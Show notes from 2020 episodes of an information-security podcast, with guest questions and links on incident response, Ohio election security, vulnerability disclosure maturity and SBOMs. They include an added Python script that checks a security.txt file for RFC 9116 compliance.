Security Strategy and Incident Response, eZCater
Confident Defense Podcast - https://www.confidentdefense.com/podcast
https://www.linkedin.com/in/conordsherman/
Agenda:
Bio (How did I get here?)
Prior preparation and planning prevents poor performance - https://military.wikia.org/wiki/7_Ps_(military_adage)
Discover unique malware
FIN 6 - https://www.zdnet.com/article/cybercrime-group-fin6-evolves-from-pos-malware-to-ransomware/
FIN 7 - https://threatpost.com/fin7-retools/149117/
CCPA - https://oag.ca.gov/privacy/ccpa
CIS 20 is a 'reasonable security program' per California AG - https://www.prnewswire.com/news-releases/california-attorney-general-concludes-that-failing-to-implement-the-center-for-internet-securitys-cis-critical-security-controls-constitutes-a-lack-of-reasonable-security-300223659.html
IBM breach cost: "Cost Of A Data Breach" (search this) https://newsroom.ibm.com/2020-07-29-IBM-Report-Compromised-Employee-Accounts-Led-to-Most-Expensive-Data-Breaches-Over-Past-Year
Cloud Infra Compliance - Governance as Code - https://www.cio.com/article/3277611/governance-as-code-keeping-pace-with-the-rate-of-change-in-the-cloud.html
"In the future, governance as code will be the backbone driving our IT systems and services. It will enable us to deliver consistent, efficient and highly repeating business outcomes at the lowest possible cost, with the maximum availability and security, while also allowing our people to expand into new and higher value-add roles across business."
Detection as Code
"Freedom within Limits" - Security as Solutions Engineers https://www.howwemontessori.com/how-we-montessori/2020/02/freedom-within-limits-what-it-looks-like-in-our-home-with-three-children.html
Sigma: https://github.com/Neo23x0/sigma - "Sigma is a generic and open signature format that allows you to describe relevant log events in a straightforward manner. The rule format is very flexible, easy to write and applicable to any type of log file."
Japan CERT event ID whitepaper: https://www.jpcert.or.jp/english/pub/sr/DetectingLateralMovementThroughTrackingEventLogs_version2.pdf
https://jpcertcc.github.io/ToolAnalysisResultSheet/
https://shield.mitre.org/ - "Shield is an active defense knowledge base MITRE is developing to capture and organize what we are learning about active defense and adversary engagement. Derived from over 10 years of adversary engagement experience, it spans the range from high level, CISO ready considerations of opportunities and objectives, to practitioner friendly discussions of the TTPs available to defenders."
IR Playbooks - process of creating them (probably the hardest)
Implementation
Tabletop exercise (length, stakeholders, crafting a scenario to compare against)
What if an org has nothing? "We just blow up the environment and start over."
RTO/RPO metrics: How long can you survive as a company with an outage? How long does it take to get back online and operational? What's your appetite for the risk of that?
Lots of dependencies to creating https://swimlane.com/blog/incident-response-playbook
Tabletop discussion - sponsors involved
Initiating condition
Threat modeling
Process steps
Best practices and local policies
End state - what is the goal? (eradicate infection, back to operating status)
Relation to governance/regulatory reqs. (do we have to report? What do we report? Fallout from incident, etc)
Lessons Learned
https://sbscyber.com/resources/7-steps-to-building-an-incident-response-playbook (seems like there are different methodologies)
Why are the things that will give organizations the biggest benefit over time the cause of the most consternation?
S2020 Ep 402020-040- Jeremy Mio, State of Ohio Election Security
Previous Election Security podcast: https://brakeingsecurity.com/2018-042-election-security-processes-in-the-state-of-ohio
Jeremy Mio (@cyborg00101) https://itsecurity.cuyahogacounty.us/
Ohio Counties Meet LaRose's Deadline to Strengthen Election Security - Ohio Secretary of State (ohiosos.gov)
(added cybersecurity Directives during 2018 last podcast -jmio)
Directive 2018-15 (6/21/18) - Cybersecurity: EI-ISAC Membership, DHS Services, IDS (Albert) Monitoring, Elections Infrastructure Security Assessment, Secure Online Services (DDoS Protection); examples via the State: Win10, DB Modernization, MFA, Cloud Email Pilot, IT Support Pilot
Directive 2018-30 (9/28/18) - Reminder and Additional Clarifications
Einstein (US-CERT program) - Wikipedia
Albert Program
(added new cybersecurity Directives since last podcast -jmio)
Directive 2019-07 (5/06/19) - Specifics on security event reporting (expansion on 2017 Directive)
Directive 2019-08 (6/11/19) - Expansion on 2018 and technical guides
Continuing 2018 requirements: EI-ISAC members, phishing tests, vulnerability scanning, continue to secure online systems (TLS/DDoS)
Remediate all high priority findings from 2018 assessment by 1/31/2020
Additional technical requirements
Additional DHS Services requested by 7/19/2019 (mitigate high findings by 1/31/20): Risk and Vulnerability assessment, Remote Pen Test, Arch Design Review, Cyber Threat Hunt
Others: 2019 TTX, required all to use .US or .GOV domain, Annual assessments and background checks, Technical procurement guide, DMARC
LaRose issues directive to set a new standard for election security in 2020 (added -jmio)
LaRose Announces Pick For Chief Information Security Officer
Directive 2020-12 (7/14/20): Additional cybersecurity (and other) requirements by 8/28/2020
Cybersecurity Liaisons
Extended IDS Albert funding and SIEM Services
New: EDR and MDBR by 8/28/2020 (and additional push for DMARC)
Securing Online Services and WAF, and requiring DHS Services Annually
Vulnerability Management: Critical and High SLA
Continue Annual cybersecurity training and background checks (including vendors/contractors), Physical Security Training
Emergency Planning with local EMA and Sheriff
Vuln disclosure policy: Vulnerability Disclosure Policy - Ohio Secretary of State (ohiosos.gov)
Did anyone think to pentest the vuln acceptance form? (lol, layers in layers --brbr)
8/11/20: LAROSE ISSUES FIRST IN THE NATION SECRETARY OF STATE VULNERABILITY DISCLOSURE POLICY (added -jmio)
DHS Vulnerability Disclosure Policy Directive
Ohio to ramp up election security with new federal funds | TheHill - "Ohio has taken steps to combat those types of threats. In October, Ohio Gov. Mike DeWine (R) signed into law a measure that required post-election audits to ensure the accuracy of the vote count, and created a "civilian cyber security reserve" to defend against potential cyberattacks."
Directive 2020-12 - "Cybersecurity Liaisons" (added -jmio)
LaRose says invitation to hackers will set new election security standard; expert says it's risky (wcpo.com) - "His [secretary of state LaRose] first-of-its-kind Vulnerability Disclosure Policy invites Ohio's crop of "white-hat" hackers — the good guys, opposite malevolent "black-hat" hackers — to break into the state's election system, find bugs and report them so officials can ensure they're fixed by Election Day. There are some strings attached: White hats aren't allowed to phish for information or tamper with electronic county voter registration systems, and actual voting machines — legally barred from being connected to the internet — are off-limits. If they do find sensitive information, they're expected to report it."
How did the threat model shift from the last time we talked? What has changed in terms of organization and threats?
You mentioned 4-5 different voting regions last time, all with different levels of technology. Any updates on the tech?
How did covid change how voting occurred?
How have you leveraged the Elections Infrastructure ISAC (EI-ISAC) in passing along threats and sharing information?
LAROSE TAKES ACTION IN RESPONSE TO IRANIAN CYBER THREATS (added -jmio)
Has insider threat been part of your threat model and what has your group done to minimize the chances? (why does it feel like the Oscars has more scrutiny in terms of voting security than the US democratic process? --brbr)
What does physical security look like in terms of people going to the polls? (wasn't sure if that was something in your purview --brbr) (this is not (Election Board and Sheriff), but can discuss high level -jmio)
Using hardware domain block services? Malicious Domain Blocking and Reporting (MDBR) Newest Service for U.S. SLTTs (cisecurity.org)
LaRose Setting New Standard For Election Security - Ohio Secretary of State (ohiosos.gov) - 88 election districts will have access to domain blocking tech (mandated to start by 28 August 2020), cybersecurity experts.
Can you give us an update on any of what was mentioned in the press re
S2020 Ep 392020-039-Philip Beyer-leadership- making an impact
Phil Beyer - Bio (CISO at Etsy)
Importance of books about behavioral science.
"Thinking Fast and Slow": https://smile.amazon.com/Thinking-Fast-Slow-Daniel-Kahneman/dp/0374533555
"Predictably Irrational": https://smile.amazon.com/Predictably-Irrational-Revised-Expanded-Decisions/dp/0061353248/
http://humanhow.com/list-of-cognitive-biases-with-examples/
Influence: the Psychology of Persuasion: https://smile.amazon.com/Influence-Psychology-Persuasion-Robert-Cialdini/dp/006124189X
Brain at Work: https://smile.amazon.com/Your-Brain-Work-Revised-Updated/dp/0063003155/
Atomic Habits: https://smile.amazon.com/Atomic-Habits-Proven-Build-Break/dp/0735211299/
Tiny Habits: https://smile.amazon.com/Tiny-Habits-Changes-Change-Everything/dp/0358003326/
New Leader's 100 Day Action Plan: https://smile.amazon.com/New-Leaders-100-Day-Action-Plan/dp/1119223237/
Podcasts:
Manager Tools Podcast: https://manager-tools.com
Career Tools Podcast: https://www.manager-tools.com/all-podcasts?field_content_domain_tid=5
Seth Godin Akimbo: https://www.akimbo.link/
Masters of Scale: https://mastersofscale.com/
Habit stacking - Temptation bundling - Availability Heuristic: https://en.wikipedia.org/wiki/Availability_heuristic
Brian's Recommendations:
Extraordinary Popular Delusions and the Madness of Crowds: https://www.amazon.com/Extraordinary-Popular-Delusions-Madness-Crowds/dp/1463740514
Big 9: https://www.amazon.com/Big-Nine-Thinking-Machines-Humanity/dp/154177373X
Bryan's Book Recommendations:
Malcolm Gladwell's Talking to Strangers: https://smile.amazon.com/Talking-to-Strangers-audiobook/dp/B07NJCG1XS
The Effective Manager by Mark Horstman: https://smile.amazon.com/The-Effective-Manager-audiobook/dp/B071JSWHBJ
ADKAR: A Model for Change in Business, Government and our Community: https://smile.amazon.com/ADKAR-Change-Business-Government-Community/dp/1930885504
Improved interviews online
First 90 days as CISO
First 90 day plan: https://www.manager-tools.com/2012/06/90-day-new-job-plan-overview
Capability Assessment: https://www.strategyand.pwc.com/gx/en/unique-solutions/capabilities-driven-strategy/capabilities-assessment.html
Socratic method: https://en.wikipedia.org/wiki/Socratic_method
Impacts to make:
Building rapport with new directs
Creating a new relationship 'budget' with manager/board, colleagues
Planning your strategy to make meaningful change in the org as a whole

SPONSORED PODCAST: Neil Patel, Illumio on Microsegmentation, and adopting the Zero Trust philosophy
Spokesperson: Neil Patel (Sr. Technical Marketing Engineer, Illumio)
Topic: Zero Trust and the segmentation market
Related episode: http://brakeingsecurity.com/2020-023-jame-nelson-from-illumio-cyber-resilence-business-continuity
What is Zero Trust and why should companies adopt a Zero Trust philosophy?
Amanda: What is one of the more important steps someone should take when looking to implement Zero Trust?
How does segmentation fit in a Zero Trust model?
What are some of the challenges and benefits that come with segmentation?
Are there real-world examples of how segmentation has stopped a breach, and how does that relate to the Zero Trust philosophy?
How can Zero Trust principles help prevent the spread of ransomware or another security epidemic?
Do you need 100% asset management already before implementing, or is that part of what you do as well?
Integrations: you mentioned auth functions, but how integrated can Illumio go with your environment? EDR? NDR? (Saw on your site that you're fully integrated with CrowdStrike Falcon.)
Tell us more about the Forrester Wave. What do the findings mean and why do they matter? https://www.illumio.com/resource-center/research-report/forrester-wave-zero-trust-2020
https://www.illumio.com/
Twitter: https://twitter.com/illumio
LinkedIn: https://www.linkedin.com/company/illumio/mycompany/

S2020 Ep 38: 2020-038-Phil Beyer, Etsy CISO, leadership, making an impact
Phil Beyer - bio (CISO at Etsy)
The importance of books about behavioral science:
"Thinking, Fast and Slow": https://smile.amazon.com/Thinking-Fast-Slow-Daniel-Kahneman/dp/0374533555
"Predictably Irrational": https://smile.amazon.com/Predictably-Irrational-Revised-Expanded-Decisions/dp/0061353248/
List of cognitive biases with examples: http://humanhow.com/list-of-cognitive-biases-with-examples/
"Influence: The Psychology of Persuasion": https://smile.amazon.com/Influence-Psychology-Persuasion-Robert-Cialdini/dp/006124189X
"Your Brain at Work": https://smile.amazon.com/Your-Brain-Work-Revised-Updated/dp/0063003155/
"Atomic Habits": https://smile.amazon.com/Atomic-Habits-Proven-Build-Break/dp/0735211299/
"Tiny Habits": https://smile.amazon.com/Tiny-Habits-Changes-Change-Everything/dp/0358003326/
"The New Leader's 100-Day Action Plan": https://smile.amazon.com/New-Leaders-100-Day-Action-Plan/dp/1119223237/
Podcasts:
Manager Tools Podcast: https://manager-tools.com
Career Tools Podcast: https://www.manager-tools.com/all-podcasts?field_content_domain_tid=5
Seth Godin's Akimbo: https://www.akimbo.link/
Masters of Scale: https://mastersofscale.com/
Habit stacking - temptation bundling - availability heuristic: https://en.wikipedia.org/wiki/Availability_heuristic
Brian's recommendations:
"Extraordinary Popular Delusions and the Madness of Crowds": https://www.amazon.com/Extraordinary-Popular-Delusions-Madness-Crowds/dp/1463740514
"The Big Nine": https://www.amazon.com/Big-Nine-Thinking-Machines-Humanity/dp/154177373X
Bryan's book recommendations:
Malcolm Gladwell's "Talking to Strangers": https://smile.amazon.com/Talking-to-Strangers-audiobook/dp/B07NJCG1XS
"The Effective Manager" by Mark Horstman: https://smile.amazon.com/The-Effective-Manager-audiobook/dp/B071JSWHBJ
"ADKAR: A Model for Change in Business, Government and our Community": https://smile.amazon.com/ADKAR-Change-Business-Government-Community/dp/1930885504
Improved interviews online
First 90 days as CISO
First 90-day plan: https://www.manager-tools.com/2012/06/90-day-new-job-plan-overview
Capability assessment: https://www.strategyand.pwc.com/gx/en/unique-solutions/capabilities-driven-strategy/capabilities-assessment.html
Socratic method: https://en.wikipedia.org/wiki/Socratic_method
Impacts to make:
Building rapport with new directs
Creating a new relationship 'budget' with manager/board, colleagues
Planning your strategy to make meaningful change in the org as a whole
S2020 Ep 37: 2020-037-Katie Moussouris, implementing VCMM, diversity in job descriptions - Part 2
Introduce Katie (bio) (@k8em0), CEO and owner, Luta Security
The scope of the VCMM (what is it?)
VCMM - Vulnerability Coordination Maturity Model: https://www.lutasecurity.com/vcmm
Does it just cover the internal process? Is it to ready an org for a bug bounty program, or to accept vulns from security researchers?
You mentioned not playing whack-a-mole when it comes to responding at the beginning of a vuln disclosure program. Is directing the different categories of bugs one of the things that keeps you from just waiting for the bugs to roll in?
Will this work for internal security or red teams as well, or is this more suited to bug bounties?
What's the timeline for this process? "We need something for a product launch next week…"
Stakeholders involved? CISO? Security team? IT? Devs?
What precipitates the need for this? Maturity? Vuln disclosure?
Are the ISO docs required for this to work, or will they assist in an easier outcome?
https://blog.rapid7.com/2017/12/19/nist-cyber-framework-revised-to-include-coordinated-vuln-disclosure-processes/
https://www.rsaconference.com/industry-topics/video/bug-bounty-programs-arent-enough-for-todays-cyber-threats-katie-moussouris-rsac
10 worst jobs (PopSci article): https://web.archive.org/web/20070712070214/https://www.popsci.com/popsci/science/0203101256a23110vgnvcm1000004eecbccdrcrd.html
https://www.nbcnews.com/tech/security/how-teenage-fortnite-player-found-apple-s-facetime-bug-why-n963961
How does an org use this to communicate vulnerabilities in their own products?
What's the bare minimum you need on this chart for a successful program? Are any facets more important than the others?
Does anyone hit all 3s, or is that a pipe dream?
Incentive: "no legal action will be taken". People want money… not tours, not 10-point font. How do you convince 'good' bug writers to want to help you for a 'thank you'?
Should incentive be a 'Level 3', or would you consider it not ready for prime time?
https://www.zdnet.com/article/yahoo-changes-bug-bounty-policy-following-t-shirt-gate/
Vuln reporting: lots of Twitter fodder about companies that handle vuln disclosure poorly; some folks even say you shouldn't bother and should deal with a 3rd party instead.
If a company is taking bugs and doing all the baseline items, what are some other things they could do to make security disclosure easier?
security.txt?
A clearly stated bugs@ or security@ address (and not buried in 3-point font in the privacy policy or ToS)?
An SLA to reply to all bugs?
A standardized disclosure form for discoveries?
Slide presentation overview: https://7bb97855-c50f-4dce-9a1c-325268684c64.filesusr.com/ugd/ed9b4b_f04d16446542494887906777a39204bf.pdf
ISO 29147:2018 - $150 USD: https://www.iso.org/standard/72311.html
ISO 30111:2019 - $95 USD: https://www.iso.org/standard/69725.html
ISO 27034-7:2018 - $150 USD: https://www.iso.org/standard/66229.html
S2020 Ep 36: 2020-036-Katie Moussouris, Vulnerability Coordination Maturity Model, when are you ready for a bug bounty - Part 1
Introduce Katie (bio) (@k8em0), CEO and owner, Luta Security
The scope of the VCMM (what is it?)
VCMM - Vulnerability Coordination Maturity Model: https://www.lutasecurity.com/vcmm
Does it just cover the internal process? Is it to ready an org for a bug bounty program, or to accept vulns from security researchers?
You mentioned not playing whack-a-mole when it comes to responding at the beginning of a vuln disclosure program. Is directing the different categories of bugs one of the things that keeps you from just waiting for the bugs to roll in?
Will this work for internal security or red teams as well, or is this more suited to bug bounties?
What's the timeline for this process? "We need something for a product launch next week…"
Stakeholders involved? CISO? Security team? IT? Devs?
What precipitates the need for this? Maturity? Vuln disclosure?
Are the ISO docs required for this to work, or will they assist in an easier outcome?
https://blog.rapid7.com/2017/12/19/nist-cyber-framework-revised-to-include-coordinated-vuln-disclosure-processes/
https://www.rsaconference.com/industry-topics/video/bug-bounty-programs-arent-enough-for-todays-cyber-threats-katie-moussouris-rsac
10 worst jobs (PopSci article): https://web.archive.org/web/20070712070214/https://www.popsci.com/popsci/science/0203101256a23110vgnvcm1000004eecbccdrcrd.html
https://www.nbcnews.com/tech/security/how-teenage-fortnite-player-found-apple-s-facetime-bug-why-n963961
How does an org use this to communicate vulnerabilities in their own products?
What's the bare minimum you need on this chart for a successful program? Are any facets more important than the others?
Does anyone hit all 3s, or is that a pipe dream?
Incentive: "no legal action will be taken". People want money… not tours, not 10-point font. How do you convince 'good' bug writers to want to help you for a 'thank you'?
Should incentive be a 'Level 3', or would you consider it not ready for prime time?
https://www.zdnet.com/article/yahoo-changes-bug-bounty-policy-following-t-shirt-gate/
Vuln reporting: lots of Twitter fodder about companies that handle vuln disclosure poorly; some folks even say you shouldn't bother and should deal with a 3rd party instead.
If a company is taking bugs and doing all the baseline items, what are some other things they could do to make security disclosure easier?
security.txt?
A clearly stated bugs@ or security@ address (and not buried in 3-point font in the privacy policy or ToS)?
An SLA to reply to all bugs?
A standardized disclosure form for discoveries?
Slide presentation overview: https://7bb97855-c50f-4dce-9a1c-325268684c64.filesusr.com/ugd/ed9b4b_f04d16446542494887906777a39204bf.pdf
ISO 29147:2018 - $150 USD: https://www.iso.org/standard/72311.html
ISO 30111:2019 - $95 USD: https://www.iso.org/standard/69725.html
ISO 27034-7:2018 - $150 USD: https://www.iso.org/standard/66229.html
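The disclosure-hygiene items in both Katie Moussouris episodes above (a security.txt file, a clearly stated security@ contact, an Expires date that is still valid) are things a reporter can check in seconds, so they are worth checking before a bug bounty ever opens. The following is an added example, not code from the podcast or from Luta Security: it parses a security.txt as later standardized in RFC 9116 and reports what a reporter would trip over, such as a missing or expired Expires field, a Contact that is not a mailto:/https:/tel: URI, or a policy link served over plain http. The two sample files and the AS_OF reference date are constructed for the demonstration; example.com is a reserved documentation domain.

```python
"""Sanity-check a security.txt file the way a vulnerability reporter would.

Added example for the vulnerability-disclosure discussion above; it is not
code from the podcast or from Luta Security. security.txt is served at
/.well-known/security.txt (RFC 9116). The sample files and the AS_OF
reference date below are constructed for this demonstration.
"""
from datetime import datetime, timezone
from urllib.parse import urlparse

# RFC 9116: Contact and Expires are required, Expires appears exactly once
# and should be less than a year out, Contact values are URIs, and web
# URIs in the file are expected to be https.
REQUIRED_FIELDS = ("Contact", "Expires")
CONTACT_SCHEMES = ("mailto", "https", "tel")
WEB_URI_FIELDS = ("Encryption", "Policy", "Canonical", "Acknowledgments", "Hiring")

# Constructed reference date so the checks below are reproducible.
AS_OF = datetime(2020, 10, 1, tzinfo=timezone.utc)

GOOD_FILE = """\
# Constructed sample; example.com is a reserved documentation domain
Contact: mailto:security@example.com
Contact: https://example.com/security/report
Expires: 2021-06-30T00:00:00Z
Encryption: https://example.com/pgp-key.txt
Policy: https://example.com/security/disclosure-policy
Preferred-Languages: en
"""

BAD_FILE = """\
# Constructed sample of the mistakes reporters run into
Contact: security@example.com
Expires: 2019-01-01T00:00:00Z
Policy: http://example.com/security
"""


def parse_security_txt(text):
    """Return {field: [values]} in file order, skipping comments and blanks."""
    fields = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if ":" not in line:
            raise ValueError("malformed line: %r" % line)
        name, value = line.split(":", 1)
        fields.setdefault(name.strip(), []).append(value.strip())
    return fields


def parse_expires(value):
    """Parse an RFC 3339 timestamp; a naive value is treated as UTC."""
    when = datetime.fromisoformat(value.replace("Z", "+00:00"))
    if when.tzinfo is None:
        when = when.replace(tzinfo=timezone.utc)
    return when


def check_security_txt(text, now=AS_OF):
    """Return a list of findings; an empty list means the file passes."""
    fields = parse_security_txt(text)
    findings = []
    for name in REQUIRED_FIELDS:
        if name not in fields:
            findings.append("missing required field: %s" % name)
    for contact in fields.get("Contact", []):
        if urlparse(contact).scheme not in CONTACT_SCHEMES:
            findings.append("Contact is not a mailto:/https:/tel: URI: %s" % contact)
    expires = fields.get("Expires", [])
    if len(expires) > 1:
        findings.append("Expires must appear exactly once")
    for value in expires:
        try:
            when = parse_expires(value)
        except ValueError:
            findings.append("Expires is not an RFC 3339 timestamp: %s" % value)
            continue
        if when <= now:
            findings.append("file expired on %s; reporters will not trust it" % value)
        elif (when - now).days > 365:
            findings.append("Expires is more than a year out: %s" % value)
    for name in WEB_URI_FIELDS:
        for uri in fields.get(name, []):
            if urlparse(uri).scheme != "https":
                findings.append("%s is not an https URI: %s" % (name, uri))
    return findings


if __name__ == "__main__":
    for label, text in (("good", GOOD_FILE), ("bad", BAD_FILE)):
        print(label, check_security_txt(text) or ["ok"])
```

Run it against a copy of your own /.well-known/security.txt with `now` left at the default or set to the current time; the Expires check is the one that rots silently, since the file is written once and the date passes a year later.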
S2020 Ep 35: 2020-035-ransomware death in Germany, Zerologon woes, Drovorub, and corp data on personal devices
Find us now on Amazon Music! https://music.amazon.com/podcasts/51b7da82-c223-4de4-8fc1-d1c3dd61984a/Brakeing-Down-Security-Podcast
Shout-out to the organizers of BSides Edmonton, Alberta, Canada for a great conference!
Amanda's social media takeover this week
Bryan's plumbing story (a tale of 3 toilets)
Corporate data on personal devices: https://www.infosecurity-magazine.com/news/corporate-data-on-personal-devices/
Fatality after hospital hacked: https://www.infosecurity-magazine.com/news/fatality-after-hospital-hacked/
https://fortune.com/2020/09/18/ransomware-police-investigating-hospital-cyber-attack-death/
Zerologon: https://nakedsecurity.sophos.com/2020/09/17/zerologon-hacking-windows-servers-with-a-bunch-of-zeros/
US govt orders federal agencies to patch the dangerous Zerologon bug by Monday, 21 September, 11:59 PM EDT: https://www.zdnet.com/article/us-govt-orders-federal-agencies-to-patch-dangerous-zerologon-bug-by-monday/
Tweet mentioning not needing to reset passwords for access: https://twitter.com/_dirkjan/status/1307662409436475392
https://twitter.com/MsftSecIntel/status/1308941504707063808?s=20
Linux malware (Drovorub): https://www.tripwire.com/state-of-security/featured/drovorub-malware/
https://www.zdnet.com/article/this-surprise-linux-malware-warning-shows-that-hackers-are-changing-their-targets/
Rampant Kitten's arsenal includes Android malware that bypasses 2FA
TP-Link cloud cameras (NCxxx) Bonjour: https://exploit.kitploit.com/2020/09/tp-link-cloud-cameras-ncxxx-bonjour.html
https://www.infosecurity-magazine.com/news/former-pm-passport-phone-hacker/
Bluetooth spoofing bug in IoT devices: https://threatpost.com/bluetooth-spoofing-bug-iot-devices/159291/
Good stuff: lateral movement detection with basic GPO settings (Compass Security white paper): https://compass-security.com/fileadmin/Datein/Research/White_Papers/lateral_movement_detection_basic_gpo_settings_v1.0.pdf
S2020 Ep 34: 2020-034-Fortnite account selling, process change agility, IRS wanting to track the 'untrackable'
Web hackers' weapons, a collection of tools: https://www.kitploit.com/2020/05/web-hackers-weapons-collection-of-cool.html
Hackers attack the gaming industry and sell accounts: https://www.ehackingnews.com/2020/09/hackers-attack-gaming-industry-sell.html
Windows 10 as a penetration testing OS: https://www.secjuice.com/windows-10-penetration-testing-os/
Nice to see stories about using Win10 as a pentest platform. Was always a PITA to update Kali or whatever. @secjuice One reason I enjoyed Dave Kennedy's 'pentester framework'. --brbr
https://www.ehackingnews.com/2020/09/a-new-security-vulnerability-discovered.html
IRS offers grants to contractors able to trace cryptocurrency transactions across the blockchain: https://www.zdnet.com/article/irs-offers-grants-to-contractors-able-to-trace-cryptocurrency-transactions-across-the-blockchain/
Adobe Flash end of support: https://docs.microsoft.com/en-us/lifecycle/announcements/adobe-flash-end-of-support
Let's flatten five agile fallacies: https://kbondale.wordpress.com/2020/09/13/lets-flatten-five-agile-fallacies/
Speak more to the need for process improvement. Trying to embrace a new 'agile' methodology is bunk; find the inefficiencies, work to improve those, and collect metrics to show the improvements.
The intersection of change management and project management: https://www.linkedin.com/pulse/intersection-change-management-project-paula-alsher/
This leads to an excellent segue to our book club. Buy the book: https://brakesec.com/adkar - used copies on Amazon are going for less than $10 USD
Book club: Thursday, September 17, 2020, 7pm Pacific
FEEDBACK: "Gotta say I'm really enjoying this book. It has my mind moving in so many directions - our team's change initiatives and desires, the agency-level initiatives, other change leaders in our org and their tools/techniques and successes/failures."
The CISO's guide to reporting cybersecurity to the board: https://securityscorecard.com/blog/the-cisos-guide-to-reporting-cybersecurity-to-the-board (this came up during a discussion on our Slack)
S2020 Ep 33: 2020-033-Garmin hack, Tesla employee thwarted IP espionage, Slack RCE payout, and more!
WWHF class (Ms. Berlin): "Breaching the Cloud" with @dafthack: https://www.blackhillsinfosec.com/breaching-the-cloud-perimeter-w-beau-bullock/
WWHF at Secure WV: https://wildwesthackinfest.com/wwhf-at-secure-wv/
IWCE 2020 panel: "Being a thought leader"
ADKAR class, book club on 03 September 2020, 7pm: https://smile.amazon.com/ADKAR-Change-Business-Government-Community/dp/1930885504/ref=sr_1_1?dchild=1&keywords=ADKAR&qid=1598543747&sr=8-1
TLS certificate lifetime is now capped at 13 months (398 days): https://www.bleepingcomputer.com/news/technology/you-have-two-days-left-to-purchase-2-year-tls-ssl-certificates/
Tesla and FBI prevented $1 million ransomware hack at Gigafactory Nevada: https://electrek.co/2020/08/27/tesla-fbi-prevent-ransomware-hack-gigafactory-nevada/
Garmin hack: https://www.privateinternetaccess.com/blog/the-garmin-hack-could-have-been-a-disastrous-large-scale-privacy-breach/
Remote code execution in Slack desktop apps (HackerOne report): https://hackerone.com/reports/783877
https://www.reddit.com/r/netsec/comments/iifh3r/remote_code_execution_in_slack_desktop_apps/
Reserved campsites for InfosecCampout 2021
MHH Feel Good Boxes: https://lovethesecookies.com/
Trojan - "not my fault": segfaults and then injects DLLs
@seaseceast
S2020 Ep 32: 2020-032-Dr. Allan Friedman, SBOM, software transparency, and how the sausage is made - Part 2
Ms. Berlin: tabletop D&D exercise
Blumira is hiring: https://www.blumira.com/career/lead-backend-engineer/
Allan Friedman - Director of Cybersecurity Initiatives, NTIA, US Department of Commerce
NTIA.gov - National Telecommunications and Information Administration
SBOM guidance: https://www.ntia.gov/sbom
Healthcare SBOM PoC: https://www.ntia.gov/files/ntia/publications/ntia_sbom_healthcare_poc_report_2019_1001.pdf
Allan's talk at BSides San Francisco: https://www.youtube.com/watch?v=9j1KYLfklMQ
Questions (more may be added during the show, depending on answers given):
What is NTIA?
What is an SBOM? Why do we need one? Is it poor communication between vendors?
Is there any difference between "software transparency" and "software bill of materials"?
How do you make an SBOM? What data formats make sharing easier?
What does a company do with an SBOM?
Where in development (hardware or software) would you be creating an SBOM?
You mention in your BSidesSF talk 'how detailed it should be'. Can you give us an example of a high-level SBOM versus a more detailed one? Does it become a risk/reward effort concerning detail?
IoT device creators are working with their 3rd parties, who are working with their 3rd parties. Someone at home with a webcam cannot easily ask for an SBOM, so how do we convince device makers to want to ask for them?
How do you get your 3rd party that is a multi-national corporation to supply you with the information you need to ?
As we saw with RIPPLE20, many companies don't know what they have. How would an SBOM help keep another RIPPLE20 from happening?
Rob Graham's blog post highlighted that vulns like Heartbleed would not have been stopped. How does this help us track potential vulns?
Sharing information: what is the best way to share information about IoT components? Could an information sharing org (ISAC) track these more readily?
Vendor assessments: the vendor does not have an SBOM; are there specific questions we might ask that will allow an org to get more resolution into a potential vendor?
Interesting feedback from NTIA's RFC
Other SBOM types (CycloneDX, OpenBOM, FDA's CBOM). Companies are out there creating SBOMs, and other government agencies have SBOM implementations. How do we keep this from being the XKCD 927 issue? https://xkcd.com/927/
Non-US implementations of SBOM?
How do we get our companies to implement these?
An SBOM could easily be something that gives hackers a lot of information about your org, and depending on the information contained, I could see why you might not want to get super specific… Thoughts?
What is a 'bill of materials'? "A bill of materials (BOM) is a comprehensive inventory of the raw materials, assemblies, subassemblies, parts and components, as well as the quantities of each, needed to manufacture a product. In a nutshell, it is the complete list of all the items that are required to build a product."
SBOM - definition
As of November 2019, an estimated 126 different IoT platforms: https://www.postscapes.com/internet-of-things-platforms/
NTIA did an RFC on "promoting the sharing of Supply Chain Security Risk Information": https://www.ntia.gov/federal-register-notice/2020/request-comments-promoting-sharing-supply-chain-security-risk
https://www.ntia.gov/federal-register-notice/2020/comments-promoting-sharing-supply-chain-security-risk-information-0
Secure and Trusted Communications Network Act of 2019 (Act) - calling it "CBOM"
Other groups working on similar efforts:
FDA: https://www.fda.gov/media/119933/download
SPDX (Linux Foundation): https://spdx.org/licenses/
OpenBOM: https://medium.com/@openbom/friday-discussion-why-boms-are-essential-for-the-iot-platform-e2c4bd397afd
CycloneDX specification: https://github.com/CycloneDX/specification
FDA medical device cybersecurity: https://www.fda.gov/medical-devices/digital-health/cybersecurity
FDA guidance on the content of premarket submissions for software contained in medical devices: https://www.fda.gov/regulatory-information/search-fda-guidance-documents/guidance-content-premarket-submissions-software-contained-medical-devices
Medical device IR playbook (MITRE): https://www.mitre.org/sites/default/files/publications/pr-18-1550-Medical-Device-Cybersecurity-Playbook.pdf
Companies are helping to get a "CBOM" for devices: "It can take anywhere from six months to a year for a new medical device to get its 510(k) clearance from the FDA," said MedCrypt CEO Mike Kijewski in a news release. https://www.medicaldesignandoutsourcing.com/medcrypt-acquires-medisao-in-medtech-cybersecurity-deal/
Does an SBOM work for DevSecOps? https://cybersecurity.att.com/blogs/security-essentials/software-bill-of-materials-sbom-does-it-work-for-devsecops
Intoto software development: https://www.intotosystems.com/
510(k) process: https://www.drugwatch.com/fda/510k-clearance/
S2020 Ep 31: 2020-031-Allan Friedman, SBOM, software transparency, and knowing how the sausage is made
Ms. Berlin: tabletop D&D exercise
Blumira is hiring: https://www.blumira.com/career/lead-backend-engineer/
Allan Friedman - Director of Cybersecurity Initiatives, NTIA, US Department of Commerce
NTIA.gov - National Telecommunications and Information Administration
SBOM guidance: https://www.ntia.gov/sbom
Healthcare SBOM PoC: https://www.ntia.gov/files/ntia/publications/ntia_sbom_healthcare_poc_report_2019_1001.pdf
Allan's talk at BSides San Francisco: https://www.youtube.com/watch?v=9j1KYLfklMQ
Questions (more may be added during the show, depending on answers given):
What is NTIA?
What is an SBOM? Why do we need one? Is it poor communication between vendors?
Is there any difference between "software transparency" and "software bill of materials"?
How do you make an SBOM? What data formats make sharing easier?
What does a company do with an SBOM?
Where in development (hardware or software) would you be creating an SBOM?
